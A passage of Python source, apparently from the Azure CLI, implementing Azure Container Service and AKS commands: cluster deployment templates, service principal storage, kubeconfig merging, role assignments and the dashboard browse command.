:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm
:type ssh_key_value: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
Possible value could be StorageAccount, ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
:param agent_vnet_subnet_id: The vnet subnet id for master pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
Possible value could be StorageAccount, ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
:param windows: If true, the cluster will be built for running Windows container.
:type windows: bool
:param admin_password: The adminstration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# if api-version is not specified, or specified in a version not supported
# override based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
# set location if void
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
# set agent_ports if void
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(windows, admin_username, admin_password)
# The resources.properties fields should match with ContainerServices' api model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd.cli_ctx, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cli_ctx, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.cli.core.profiles import ResourceType, get_sdk
DeploymentProperties = get_sdk(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES, 'DeploymentProperties', mod='models')
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
# TODO: this only works for public cloud, need other casing for national clouds
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning('Failed to merge credentials to kube config file: %s', exc)
logger.warning('The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
if not addition.get(key, False):
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError('failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError("service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds,
required_resource_access=required_resource_accesses)
try:
result = client.create(app_create_param, raw=True)
return result.output, result.response.headers["ocp-aad-session-key"]
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def update_application(client, object_id, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
try:
if key_creds:
client.update_key_credentials(object_id, key_creds)
if password_creds:
client.update_password_credentials(object_id, password_creds)
if reply_urls:
client.patch(object_id, ApplicationUpdateParameters(reply_urls=reply_urls))
return
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
# pylint: disable=too-many-statements
def aks_browse(cmd, client, resource_group_name, name, disable_browser=False,
listen_address='127.0.0.1', listen_port='8001'):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
addon_profile = addon_profiles.get("kubeDashboard", ManagedClusterAddonProfile(enabled=True))
if not addon_profile.enabled:
raise CLIError('The kube-dashboard addon was disabled for this managed cluster.\n'
'To use "az aks browse" first enable the add-on\n'
'by running "az aks enable-addons --addons kube-dashboard".')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning('To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
if err.output.find(b'unknown flag: --address'):
if listen_address != '127.0.0.1':
logger.warning('"--address" is only supported in kubectl v1.13 and later.')
logger.warning('The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy", "--port", listen_port])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
('omsagent' in result.addon_profiles) and
(hasattr(result.addon_profiles['omsagent'], 'identity')) and
(hasattr(result.addon_profiles['omsagent'].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles['omsagent'].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
# pylint: disable=too-many-statements,too-many-branches
def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_size=0,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
network_plugin=None,
network_policy=None,
uptime_sla=False,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
vnet_subnet_id=None,
max_pods=0,
min_count=None,
max_count=None,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
zones=None,
enable_node_public_ip=False,
generate_ssh_keys=False, # pylint: disable=unused-argument
api_server_authorized_ip_ranges=None,
enable_private_cluster=False,
enable_managed_identity=False,
attach_acr=None,
no_wait=False):
_validate_ssh_key(no_ssh_key, ssh_key_value)
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
availability_zones=zones,
enable_node_public_ip=enable_node_public_ip,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type,
mode="System"
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username:
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(
msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError(
'Please specify both username and password in non-interactive mode.')
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password)
# Skip create service principal profile for the cluster if the cluster
# enables managed identity and customer doesn't explicitly provide a service principal.
service_principal_profile = None
principal_obj = None
if not(enable_managed_identity and not service_principal and not client_secret):
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"),
key_vault_secret_ref=None)
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
scope = vnet_subnet_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_profile.client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
# Attach acr operation will be handled after the cluster is created
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
outbound_type = _set_outbound_type(outbound_type, vnet_subnet_id, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin, pod_cidr, service_cidr, dns_service_ip,
docker_bridge_address, network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id
)
monitoring = False
if 'omsagent' in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent'])
aad_profile = None
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
if aad_tenant_id is None:
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
